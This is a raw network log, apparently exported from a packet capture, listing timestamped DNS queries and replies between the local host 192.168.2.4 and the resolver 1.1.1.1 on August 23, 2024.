Aug 23, 2024 18:47:49.964524031 CEST	53	55488	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.965605021 CEST	53	59777	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.965945005 CEST	53	60908	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.966031075 CEST	53	52428	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.966433048 CEST	61300	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.966466904 CEST	62960	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.966850042 CEST	55694	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.966994047 CEST	53	65424	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.967036963 CEST	53	57871	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.967242956 CEST	53	62262	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.967545033 CEST	53	54640	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.967555046 CEST	53	54845	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.967885971 CEST	53	60404	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.968017101 CEST	53	62371	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.968441010 CEST	56601	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.968610048 CEST	53	51815	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.968656063 CEST	53	58764	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.968756914 CEST	57780	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.968951941 CEST	53	49798	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.969037056 CEST	53	62228	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.969475031 CEST	53	57195	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.970088005 CEST	57574	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.970674038 CEST	53	64367	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.970953941 CEST	53	52503	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.970963955 CEST	53	49807	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.970973015 CEST	53	65458	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.971486092 CEST	56266	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.972112894 CEST	51383	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.972151041 CEST	51528	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.972326040 CEST	53	53379	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.972475052 CEST	49232	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.972544909 CEST	57229	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.973105907 CEST	53	60126	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.973462105 CEST	53	52194	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.973742008 CEST	52316	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.974190950 CEST	50355	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.974318981 CEST	56663	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.974603891 CEST	65322	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.974811077 CEST	52498	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.974915028 CEST	55052	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.975128889 CEST	62800	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.975300074 CEST	54096	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.975451946 CEST	55065	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.975574017 CEST	58932	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.975720882 CEST	50199	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.975791931 CEST	53	54677	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.975928068 CEST	64810	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.976047993 CEST	60374	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:49.977725983 CEST	53	55694	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.978415012 CEST	53	61300	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.980179071 CEST	53	57780	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.981045008 CEST	53	56601	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.983022928 CEST	53	56257	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.983033895 CEST	53	57574	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.983875990 CEST	53	56266	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.984493971 CEST	53	61000	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.985168934 CEST	53	51383	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.986356974 CEST	53	55052	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.986442089 CEST	53	52316	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.986931086 CEST	53	62800	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.986941099 CEST	53	54096	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.986958981 CEST	53	58932	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.987502098 CEST	53	50199	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.989187956 CEST	53	65322	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.989846945 CEST	53	56663	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.990006924 CEST	53	55065	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.990016937 CEST	53	60374	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.991218090 CEST	53	53955	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.991906881 CEST	53	62230	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.992774010 CEST	53	50011	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.993386984 CEST	53	56784	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.995975018 CEST	53	50721	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.998308897 CEST	53	59380	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:49.999749899 CEST	53	50062	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.002525091 CEST	53	62960	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.003921032 CEST	53	55988	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.006565094 CEST	53	49232	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.007973909 CEST	53	50355	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.008632898 CEST	53	52498	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.011265039 CEST	53	64810	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.109510899 CEST	53	63480	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.121354103 CEST	53	53788	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.139991045 CEST	53	51528	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.142146111 CEST	53	57229	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.143668890 CEST	59032	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.144246101 CEST	61931	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.144831896 CEST	49289	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.145436049 CEST	59889	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.145895958 CEST	62189	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.146543026 CEST	57386	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.146686077 CEST	60387	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.146791935 CEST	53483	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.147330046 CEST	64401	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.147438049 CEST	51360	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.147830963 CEST	51661	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.148267031 CEST	51878	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.148453951 CEST	60390	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.148837090 CEST	56872	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.148895025 CEST	53153	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.150585890 CEST	52436	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.150585890 CEST	60264	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.150818110 CEST	49841	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.152854919 CEST	50304	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.152915001 CEST	58816	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.153014898 CEST	65278	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.153153896 CEST	50692	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.153153896 CEST	61757	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.153320074 CEST	54240	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.153320074 CEST	49645	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.153685093 CEST	64090	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.153685093 CEST	49952	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.154021025 CEST	64313	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.154021025 CEST	52239	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.154098034 CEST	61889	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.154412031 CEST	62635	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.154560089 CEST	54503	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.154840946 CEST	51610	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.154915094 CEST	59096	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.155168056 CEST	56707	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.155354023 CEST	63694	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.155546904 CEST	55419	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.155873060 CEST	63992	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.156138897 CEST	61121	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.156244040 CEST	61375	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.156436920 CEST	61792	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.156703949 CEST	54082	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.156703949 CEST	55349	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.157133102 CEST	63756	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.157290936 CEST	64756	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.157397032 CEST	49375	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.157601118 CEST	52472	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.157974005 CEST	51008	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.157974005 CEST	49505	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.158052921 CEST	58819	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.158389091 CEST	56259	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.158389091 CEST	56336	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.158499002 CEST	49925	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.158785105 CEST	49792	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.158785105 CEST	52439	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.158937931 CEST	61658	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.159113884 CEST	60076	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.159115076 CEST	50128	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.159317017 CEST	64137	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.159529924 CEST	55310	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.159529924 CEST	49181	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.159749985 CEST	55588	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.159749985 CEST	60350	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.159859896 CEST	62684	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:50.161559105 CEST	53	61931	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.161571026 CEST	53	59889	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.161581039 CEST	53	59032	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.162195921 CEST	53	51661	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.162347078 CEST	53	51878	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.163533926 CEST	53	64401	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.163549900 CEST	53	53483	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.163559914 CEST	53	52436	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.164674044 CEST	53	60264	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.164684057 CEST	53	60390	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.165716887 CEST	53	53153	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.166651011 CEST	53	58816	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.166661978 CEST	53	54240	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.167840958 CEST	53	61757	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.167850971 CEST	53	65278	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.167860031 CEST	53	49645	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.168001890 CEST	53	61889	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.169028044 CEST	53	62635	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.169039011 CEST	53	50304	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.169048071 CEST	53	52239	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.169059038 CEST	53	63992	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.169631958 CEST	53	50128	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.169661999 CEST	53	59096	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.169671059 CEST	53	54503	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.169687986 CEST	53	51610	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.169698954 CEST	53	61375	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.169879913 CEST	53	61792	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.170994043 CEST	53	61121	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.171005011 CEST	53	49375	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.171015024 CEST	53	55349	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.171025991 CEST	53	63694	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.171946049 CEST	53	52472	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.172138929 CEST	53	63756	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.172149897 CEST	53	49505	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.173026085 CEST	53	54082	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.173037052 CEST	53	58819	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.173047066 CEST	53	56259	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.173486948 CEST	53	49925	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.173497915 CEST	53	56336	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.173506021 CEST	53	52439	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.173985004 CEST	53	64137	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.174370050 CEST	53	61658	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.174381971 CEST	53	49181	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.174695015 CEST	53	55588	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.175193071 CEST	53	60350	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.175628901 CEST	53	49792	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.182976961 CEST	53	57386	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.183850050 CEST	53	62189	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.184283018 CEST	53	56872	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.185045004 CEST	53	49841	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.188090086 CEST	53	50692	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.188261032 CEST	53	49289	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.190515995 CEST	53	56707	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.190526009 CEST	53	64090	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.190536022 CEST	53	55419	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.192748070 CEST	53	64756	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.194565058 CEST	53	51008	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.195137024 CEST	53	60076	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.195296049 CEST	53	49952	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.195353985 CEST	53	55310	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.195364952 CEST	53	62684	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.315224886 CEST	53	51360	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.321523905 CEST	53	60387	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:50.323723078 CEST	53	64313	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.031868935 CEST	49542	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.039341927 CEST	59590	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.040000916 CEST	51070	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.047638893 CEST	53	49542	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.051379919 CEST	60656	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.051945925 CEST	61843	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.052761078 CEST	53	59590	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.053709984 CEST	53	51070	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.064255953 CEST	53	61843	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.064344883 CEST	52321	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.064960957 CEST	53	60656	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.076281071 CEST	53	52321	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.089479923 CEST	52583	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.089565992 CEST	64826	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.089683056 CEST	56531	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.089889050 CEST	52979	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.089936018 CEST	51537	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.090073109 CEST	52277	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.090141058 CEST	58172	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.090322018 CEST	57446	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.090424061 CEST	61835	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.090495110 CEST	55022	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.090563059 CEST	57316	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.090728998 CEST	54466	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.090728998 CEST	64603	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.090897083 CEST	58657	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.091399908 CEST	50281	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.091967106 CEST	64695	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.092159986 CEST	52343	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.092508078 CEST	51535	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.092823029 CEST	50884	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.092982054 CEST	51141	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.093189955 CEST	54303	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.093347073 CEST	53334	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.093529940 CEST	54147	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.093664885 CEST	65341	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.094147921 CEST	65296	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.094307899 CEST	50298	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.094666004 CEST	52705	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.094849110 CEST	60056	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.095098972 CEST	55080	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.095248938 CEST	56245	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.095700026 CEST	55424	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.095858097 CEST	65182	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.096224070 CEST	52962	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.096429110 CEST	55577	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.096621037 CEST	65203	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.097529888 CEST	53141	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.097784996 CEST	59811	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.098074913 CEST	50812	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.098234892 CEST	49905	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.098649025 CEST	54974	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.098927975 CEST	55154	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.099245071 CEST	62568	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.099461079 CEST	53204	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.099978924 CEST	53036	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.100137949 CEST	55621	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.100564003 CEST	52109	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.100825071 CEST	54214	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.107697964 CEST	53	64826	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.108751059 CEST	53	52277	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.108939886 CEST	53	57446	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.108951092 CEST	53	56531	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.109416008 CEST	53	58172	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.110503912 CEST	53	55022	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.110515118 CEST	53	52583	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.112195015 CEST	58807	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.112365007 CEST	61824	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.113445044 CEST	64357	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.113890886 CEST	53	59811	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.113955975 CEST	53	49905	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.115859032 CEST	53	53334	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.115869999 CEST	53	62568	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.115879059 CEST	53	64603	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.115889072 CEST	53	53036	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.115899086 CEST	53	50298	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.115910053 CEST	53	52705	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.115921021 CEST	53	55577	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.116048098 CEST	53	54147	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.116058111 CEST	53	50281	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.117758989 CEST	53	50884	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.117786884 CEST	53	51535	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.117796898 CEST	53	64695	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.117806911 CEST	53	55424	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.117815971 CEST	53	51141	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.117825985 CEST	53	54214	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.117835045 CEST	53	55080	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.117844105 CEST	53	60056	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.117852926 CEST	53	58657	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.120379925 CEST	53	55621	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.120390892 CEST	53	52109	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.120404005 CEST	53	55154	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.122267008 CEST	53	52962	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.124087095 CEST	53	53141	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.125272036 CEST	53	61835	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.125730038 CEST	53	52979	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.128767967 CEST	53	61824	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.129673958 CEST	53	64357	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.137514114 CEST	53	65341	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.137759924 CEST	53	54303	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.137770891 CEST	53	57316	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.137856007 CEST	53	65296	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.137866974 CEST	53	52343	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.137893915 CEST	53	54466	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.138226032 CEST	53	56245	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.153215885 CEST	53	58807	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.264358044 CEST	53	51537	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.264813900 CEST	53	53204	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.266904116 CEST	53	65182	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.281847000 CEST	63287	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.282116890 CEST	61175	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.282296896 CEST	54559	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.282501936 CEST	53	54974	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.293435097 CEST	49221	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.293555975 CEST	53	63287	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.299936056 CEST	53	50812	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.321419954 CEST	53	61175	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.329874992 CEST	53	49221	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.348587990 CEST	53	54559	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.366261005 CEST	52522	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.366467953 CEST	49479	53	192.168.2.4	1.1.1.1
